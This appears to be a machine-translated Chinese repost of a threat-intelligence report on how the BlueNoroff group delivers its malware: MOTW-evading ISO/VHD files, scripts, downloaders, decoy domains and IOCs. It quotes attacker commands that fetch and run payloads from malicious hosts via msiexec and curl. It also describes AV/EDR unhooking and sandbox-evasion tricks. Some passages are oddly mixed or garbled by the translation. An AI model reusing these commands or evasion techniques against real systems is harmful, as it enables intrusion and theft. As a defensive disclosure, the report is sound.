BlueNoroff集团是一个出于经济动机的威胁行为者,渴望从其网络攻击能力中获利。今年 10 月,我们观察到其武器库中采用了新的恶意软件。该组通常利用 Word 文档并使用快捷方式文件进行初始入侵。但是,它最近开始采用新的恶意软件传递方法。
该组织采用的第一种新方法旨在规避网络标记(MOTW)标志,这是一种安全措施,当用户尝试打开从互联网下载的文件时,Windows会显示警告消息。为此,使用了光盘映像(.iso扩展名)和虚拟硬盘(.vhd 扩展名)文件格式。这是当今用来逃避MOTW的常用策略,BlueNoroff也采用了它。
此外,该小组还测试了不同的文件类型,以改进恶意软件的传递方法。我们观察到一个新的Visual Basic Script,一个以前从未见过的Windows Batch文件和一个Windows可执行文件。BlueNoroff 背后的参与者似乎正在扩展或尝试新的文件类型,以有效地传达他们的恶意软件。
在研究了所使用的基础设施后,我们发现该组使用了 70 多个域,这意味着它们直到最近才非常活跃。此外,他们还创建了大量看起来像风险投资和银行域名的虚假域名。大多数域名都模仿日本风险投资公司,表明该集团对日本金融实体有着广泛的兴趣。
摘要
·BlueNoroff集团引入了新的文件类型来逃避网络标记(MOTW)安全措施;
·BleuNoroff组扩展了文件类型并调整了感染方法;
·BlueNoroff创建了大量冒充风险投资公司和银行的虚假域名。
背景
2022 年 9 月底,我们在遥测中观察到新的 BlueNoroff 恶意软件。经过仔细调查,我们确认该演员采用了新技术来传达最终的有效载荷。演员利用了几个脚本,包括Visual Basic Script和Windows Batch脚本。他们还开始使用磁盘映像文件格式.iso和.vhd来传递恶意软件。对于中间感染,参与者引入了一个下载器来获取并生成下一阶段的有效负载。尽管在这次战役中,最初的入侵方法非常不同,但我们之前分析的最终有效载荷没有发生重大变化。
新型感染链
长期的初始感染
根据我们的遥测数据,我们观察到阿联酋的一名受害者使用恶意 Word 文档受到攻击。受害者于 2022 年 9 月 2 日收到一个名为“Shamjit 客户详细信息表.doc”的文件文件。不幸的是,我们无法获取该文档,但它是从以下路径执行的:
C:Users[username]DesktopSALES OPS [redacted][redacted]Signed Forms & Income DocsShamjit Client Details Form.doc
Judging from the file path, we can assume that the victim was an employee in the sales department responsible for signing contracts.
Upon launch, the malicious document connects to the remote server and downloads the payload. In this particular case, the executable ieinstal.exe was used to bypass UAC.
·Remote URL: https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=
·Created payload path: %Profile%cr.dat
·Spawned command: cmd.exe %Profile%cr.dat 5pKwgIV5otiKb6JrNddaVJOaLjMkj4zED238vIU=
After initial infection, we observed several keyboard hands-on activities by the operator. Through the implanted backdoor, they attempted to fingerprint the victim and install additional malware with high privileges. Upon infection, the operator executed several Windows commands to gather basic system information. They then returned 18 hours later to install further malware with high privileges.
Post-exploitation
Based on our telemetry, when the malicious Word document opens it fetches the next payload from the remote server:
·Download URL: http://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=
The fetched payload is supposed to be saved in %Profile%update.dll. Eventually, the fetched file is spawned with the following commands:
·Command #1: rundll32.exe %Profile%update.dll,#1 5pOygIlrsNaAYqx8JNZSTouZNjo+j5XEFHzxqIIqpQ==
·Command #2: rundll32.exe %Profile%update.dll,#1 5oGygYVhos+IaqBlNdFaVJSfMiwhh4LCDn4=
One of the other methodsBlueNoroff组通常使用的是一个带有快捷方式文件的ZIP存档。我们最近发现的存档文件包含一个受密码保护的诱饵文档和一个名为“Password.txt.lnk”的快捷方式文件。这是一种经典的BlueNoroff策略,可说服受害者执行恶意快捷方式文件以获取诱饵文档的密码。发现的最新存档文件(MD5 1e3df8ee796fc8a13731c6de1aed0818)有一个日语文件名,新しいボーナススケジュール.zip(日语为“新奖金时间表”),表明他们对日本目标感兴趣。
与前面的快捷方式示例的主要区别在于,它获取了额外的脚本有效负载(Visual Basic 脚本或 HTML 应用程序);此外,此时采用了另一种获取和执行下一阶段有效载荷的方法。以下命令是在受害者双击快捷方式文件时执行的:
|
1 2 3 4 |
cmd.exe /c DeviceCredentialDeployment & echo jbusguid> %APPDATA%Pass.txt & start %APPDATA%Pass.txt && FOR %i IN (%systemroot%system32msiexec.*) DO msiexec -c /Q /i
hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd & timeout |
为了逃避检测,演员使用了离地生活二进制文件(LOLBins)。DeviceCredentialDeployment 执行是一个众所周知的 LOLBin,用于隐藏命令的窗口。该参与者还滥用 msiexe.exe 文件以静默方式启动获取的 Windows 安装程序文件。
更新的方法#1:逃避MOTW标志的技巧
我们观察到该行为者检查了不同的文件类型以传递其恶意软件。最近,许多威胁行为者采用了图像文件来避免 MOTW(网络标记)。简而言之,MOTW是微软推出的一种缓解技术。NTFS文件系统标记从互联网下载的文件,Windows以安全的方式处理该文件。例如,当从互联网获取 Microsoft Office 文件时,操作系统会在受保护的视图中打开它,这会限制嵌入式宏的执行。为了避免这种缓解技术,越来越多的威胁参与者开始滥用ISO文件类型。BlueNoroff小组可能尝试使用ISO映像文件来传递他们的恶意软件。尽管它仍在开发中,但我们提到此示例是作为早期警告。此ISO映像文件包含一个PowerPoint幻灯片放映和一个Visual Basic脚本。
ISO 映像的嵌入文件
微软PowerPoint文件包含一个链接。当用户单击链接时,它会通过 WScript 进程执行 1.vbs 文件。当我们检查VBS文件时,它只生成了一条“ok”消息,这表明BlueNoroff仍在尝试这种方法。
|
1 2 |
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="wscript%201.vbs" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships> |
根据我们的其他发现,我们发现了一个野外样本(MD5A17E9FC78706431FFC8B3085380FE29F) 来自 VirusTotal。在分析时,任何防病毒软件都未检测到此 .vhd 示例。虚拟磁盘文件包含一个诱饵 PDF 文件、Windows 可执行文件和一个加密的转储.bin文件。PDF和可执行文件在文件扩展名之前有许多空格,以隐藏它并减轻怀疑。
VHD 文件中的文件
Job_Description[空格].exe文件 (MD5931d0969654af3f77fc1dab9e2bd66b1) 是加载下一阶段有效负载的加载程序。启动时,它将 Dump.bin 文件复制到 %Templates%war[当前时间][随机值].bin(即 war166812964324445.bin)。转储.bin具有修改后的 PE 标头。恶意软件读取此文件中0xAF Dump.bin 的第一个字节,并使用该密钥解码0x3E8字节。解密的数据是PE文件的标头,将恢复的标头覆盖到原始文件。最终,它通过生成普通的第一个导出函数来加载解密的 DLL 文件。
生成的下载程序在文件末尾包含一个加密配置。恶意软件首先从文件末尾获取配置数据的总大小和有效负载 URL 的长度。它们分别位于文件末尾的四个字节和八个字节的位置。恶意软件使用嵌入式 64 字节密钥使用 RC4 算法解密配置数据。
·RC4 钥匙:46 61 44 6D 38 43 74 42 48 37 57 36 36 30 77 6C 62 74 70 79 57 67 34 6A 79 4C 46 62 67 52 33 49 76 52 77 36 45 64 46 38 49 47 36 36 37 64 30 54 45 69 6D 7A 54 69 5A 36 61 42 74 65 69 67 50 33
·恢复的网址:hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D
配置结构
但是,对于另一个下载器,有效负载 URL 是使用命令行参数传递的。此外,其他一些下载器(MD5f766f97eb213d81bf15c02d4681c50a4) 具有检查工作环境的功能。如果物理内存的大小小于 2,147,483,648 字节,恶意软件将终止执行。
下载器的感染流程
此下载器检查以下防病毒供应商的名称:Sophos,Kaspersky,Avast,Avira,Bitdefender,TrendMicro和Windows Defender。如果安装了TrendMicro,BitDefender或Windows Defender产品,则恶意软件会进行经典的解开 DLL 技巧旨在从系统库中删除用户模式挂钩。这种规避技术用新加载的 ntdll 库覆盖预加载的 ntdll 库的 .text 部分,以便使用原始 API 地址恢复挂钩的 API 地址。通过此技巧,恶意软件可以禁用EDR / AV产品的功能。接下来,恶意软件会创建互斥锁以避免重复执行。
·互斥体名称: da9f0e7dc6c52044fa29bea5337b4792b8b873373ba99ad816d5c9f5f275f03f
接下来,恶意软件在同一目录中打开一个 PDF 诱饵文档。这份诱饵文件伪装成一家日本跨国银行的工作机会。
如果受害者的计算机上安装了Windows Defender或Bitdefender Antivirus ,则恶意软件会使用以下命令自行执行:
·Windows Defender: cmd /c timeout /t 10 & Del /f /q “[current file name]” & attrib -s -h “[PDF decoy file]” & rundll32 “[current DLL file path]” #1
·Bitdefender: cmd /c timeout /t 10 & rundll32 “[current DLL file path]” #1
此恶意软件的主要目标是获取下一阶段的有效负载。为此,恶意软件使用 cURL 库,根据安装的防病毒软件组合 cURL 命令。
·已安装的 Avira 或 Avast:curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da
·其他情况: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d dl
请注意,用户代理名称为“cur1-agent”,如果受害者安装了 Avira 或 Avast ,恶意软件会发送“da”POST 数据;否则,恶意软件会发送“dl”POST 数据。如果通过 cURL 命令获取的数据包含“<html>”和“curl:”,则恶意软件会使用交付的 64 字节 RC4 密钥解密有效负载。
如果安装了 Avira 或 Avast,恶意软件会将解密的有效负载保存到“%TEMPLATES%marcoor.dll”,并使用带有有效负载 URL 的 rundll32.exe 命令生成它。
·命令: exe %TEMPLATES%marcoor.dll #1 [payload URL]
否则,恶意软件不会将有效负载写入文件,而是将获取的有效负载注入资源管理器.exe进程。获取的有效负载是 DLL 类型的可执行文件,其导出函数使用“有效负载 URL”生成。
不幸的是,到目前为止,我们还无法获得精确的感染链。但是,从我们的遥测中,我们可以确认受害者最终被后门类型的恶意软件所破坏。根据恶意软件的静态信息和部分内部代码,我们评估最终的有效负载仍然与持久性后门#2非常相似
更新的方法#2:脚本和Novel下载器
此外,我们观察到可疑批处理文件的下载和启动。演员利用了不同的LOLBins。恶意软件执行是使用系统文件夹中的合法脚本 SyncAppvPublishingServer.vbs 完成的。此脚本用于通过 Windows 计划任务执行 PowerShell 脚本。
|
1 |
WScript.exe "%system32%SyncAppvPublishingServer.vbs" "n;cmd.exe '/c curl perseus.bond/Dgy_0dU08lC/hCHEdlDFGV/P89bXhClww/uiOHK5H35B/bM%3D -A cur1-agent -o %public%regsile.bat & start /b %public%regsile.bat' |
我们还在遥测中观察了该批处理文件周围的上下文。批处理文件名为“WhatsBlockchain.bat”。正如文件名所暗示的那样,该组织仍然以区块链行业为目标。我们获取了批处理文件的脚本。
|
1 2 3 |
xcopy /h /y /q How-To-Extension.pdf c:userspublicInproc.exe* start xcopy /h /y /q Blockchain-old.pdf c:userspublicrwinsta.exe* start c:userspublicInproc.exe "%cd%Blockchain.pdf" |
Inproc.exe 是一个合法的 mshta.exe 文件 (MD50b4340ed812dc82ce636c00fa5c9bef2),而 rwinsta.exe 是一个合法的 rundll32.exe 文件 (MD5EF3179d498793BF4234F708D3BE28633).区块链.pdf文件是由mshta.exe进程生成的恶意HTML应用程序文件。不幸的是,我们没有HTA脚本(区块链.pdf),但我们可以根据遥测来假设脚本的功能 - 显示诱饵文档并获取下一阶段的有效负载。
|
1 2 3 4 5 |
# Create a decoy password file and open it. cmd.exe" /c echo {PASSWORD}>%documents%Userlink & notepad.exe %documents%Userlink
# Fetch the payload with cURL command and execute. cmd.exe" /c timeout 10 & curl perseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D -s -d md -A cur1-agent -o %documents%macroor.dll& %documents%macroor.dll #1 perseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D |
此外,我们观察到该组此时引入了一个新的Windows可执行类型下载器。此恶意软件 (MD5087407551649376d90d1743bac75aac8) 在获取远程有效负载并执行它时生成一个虚假的密码文件。执行时,它会创建一个假文件 (wae.txt) 以显示由字符串“password”组成的密码,并从嵌入式 URL 获取有效负载并加载它。这种通过记事本.exe显示密码的方案是BlueNoroff小组青睐的技巧,以避免引起受害者的怀疑。通常,密码包含打开提供的加密诱饵文档所需的密码。
带有假密码文件的简单下载器
演员可能以存档文件格式或磁盘映像文件格式交付了上述 Windows 可执行文件,并带有加密的诱饵文档。
基础设施
在进行这项研究时,我们发现演员使用了几台 C2 服务器。所有服务器都像往常一样由VPS供应商托管,其中一些被解析为相同的IP地址。域名注册可以追溯到 2021 年初,因此这是对手正在进行的行动。
|
域 |
知识产权 |
互联网服务提供商 |
ASN |
|
offerings.cloud |
104.168.174.80 |
主机风有限责任公司。 |
AS54290 |
|
Perseus.bond |
104.168.249.50 |
主机风有限责任公司。 |
AS54290 |
|
offerings.cloud |
152.89.247.87 |
康巴顿有限公司 |
编号:AS30823 |
|
offerings.cloud |
172.86.121.130 |
艾滋病毒性 |
AS29802 |
|
www.capmarketreport.com |
149.28.247.34 |
康斯坦特公司有限责任公司 |
AS20473 |
|
ms.msteam.biz |
155.138.159.45 |
康斯坦特公司有限责任公司 |
AS20473 |
该行为者通常使用虚假域(例如云托管服务)来托管恶意文档或有效负载。他们还创建了伪装成金融业合法公司和投资公司的虚假域名。这些域名,包括枢轴域名,模仿风险投资名称或大银行名称。大多数公司都是日本公司,这表明演员对日本市场有着浓厚的兴趣。
|
恶意域 |
真正的公司 |
业务类别 |
国家 |
|
beyondnextventures.co |
Beyond Next Ventures |
风险投资公司 |
日本 |
|
smbc.ltd |
三井住友银行 |
日本跨国银行和金融服务 |
日本 |
|
cloud.mufg.tokyo |
三菱UFJ金融集团 |
日本银行 |
日本 |
|
vote.anobaka.info |
阿诺巴卡 |
风险投资公司 |
日本 |
|
it.zvc.capital |
Z 风险投资 |
风险投资公司 |
日本 |
|
abf-cap.co |
澳联资本 |
风险投资公司 |
日本 |
|
天使桥资本 |
天使桥 |
风险投资公司 |
日本 |
|
mizuhogroup.us |
瑞穗金融集团 |
银行控股公司 |
日本 |
|
bankofamerica.tel 美国 |
美国 |
银行和金融服务控股公司 |
美国 |
|
tptf.us |
跨太平洋科技基金 |
风险投资公司 |
台湾 |
受害者
正如我们在“长期初始感染”一节中所描述的那样,我们发现阿联酋的一名受害者(可能是一家家庭融资公司)遭到了经典的BlueNoroff集团恶意软件的危害。这个出于经济动机的威胁行为者最近一直在攻击各种与加密货币相关的业务,但也攻击其他金融公司,就像在这种情况下一样。
此外,根据域名命名和诱饵文件,我们以较低的置信度假设日本的实体处于该集团的雷达上。在一个PowerPoint样本中,我们观察到该演员利用了一家日本风险投资公司。此外,我们在上面的“长期初始感染”部分中提到的样本以日语文件名交付给受害者,这表明目标可以阅读日语。
诱饵文件
结论
根据最近的一个报告,BlueNoroff集团利用其网络攻击能力窃取了价值数百万美元的加密货币。这表明这个团体有很强的经济动机,实际上成功地从他们的网络攻击中获利。正如我们从最新发现中看到的那样,这个臭名昭著的演员引入了轻微的修改来传递他们的恶意软件。这也表明,该组织的攻击在不久的将来不太可能减少。
妥协指标
下载器
087407551649376d90d1743bac75aac8 注册.exe
Cur1Agent 下载器
f766f97eb213d81bf15c02d4681c50a4
61a227bf4c5c1514f5cbd2f37d98ef5b
4c0fb06320d1b7ecf44ffd0442fc10ed
d8f6290517c114e73e03ab30165098f6
装载机
d3503e87df528ce3b07ca6d94d1ba9fc e:Readme.exe
931d0969654af3f77fc1dab9e2bd66b1 Job_Description..exe
恶意虚拟磁盘文件
a17e9fc78706431ffc8b3085380fe29f Job_Description.vhd
Zip 文件和解压缩的恶意快捷方式
1e3df8ee796fc8a13731c6de1aed0818 新しいボーナススケジュール.zip (新的奖励计划)
21e9ddd5753363c9a1f36240f989d3a9 密码.txt.lnk
网址
hxxp://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=
hxxp://avid.lno-prima[.]lol/NafqhbXR7KC/rTVCtCpxPH/kMjTqFDDNt/fiOHK5H35B/bM%3D
hxxp://offerings[.]cloud/NafqhbXR7KC/rTVCtCpxPH/pdQTpFN6FC/Lhr_wXGXix/nQ%3D
hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D
hxxps://docs.azure-protection[.]cloud/%2BgFJKOpVX/4vRuFIaGlI/D%2BOfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D
hxxps://docs.azure-protection[.]cloud/+gFJKOpVX/4vRuFIaGlI/D+OfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D
hxxps://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=
hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd
透视 IP 地址
152.89.247.87 172.86.121.130
104.168.174.80
MITRE ATT&CK 映射
|
策略 |
技术 |
技术名称 |
|
初始访问 |
T1566.001 T1566.002 |
网络钓鱼:鱼叉式网络钓鱼附件 网络钓鱼:鱼叉式网络钓鱼链接 |
|
执行 |
T1059.003 T1059.005 T1204.001 T1204.002 |
命令和脚本解释器:Windows 命令外壳 命令和脚本解释器:Visual Basic 用户执行:恶意链接 用户执行:恶意文件 |
|
坚持 |
T1547.008 |
启动或登录自动启动执行:LSASS 驱动程序 |
|
防御规避 |
T1027.002 T1497.001 T1055.002 T1553.005 T1218.007 T1218.011 T1221 |
混淆文件或信息:软件打包 虚拟化/沙盒规避:系统检查 进程注入:可移植可执行注入 颠覆信任控制:网页标记绕过 系统二进制代理执行:Msiexec 系统二进制代理执行:Rundll32 模板注入 |
|
命令与控制 |
T1071.001 |
应用层协议:网络协议 |
|
渗漏 |
T1041 |
通过 C2 通道渗漏 |
【侵删】
原文始发于微信公众号(KK安全说):BlueNoroff引入了绕过MoTW的新方法
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论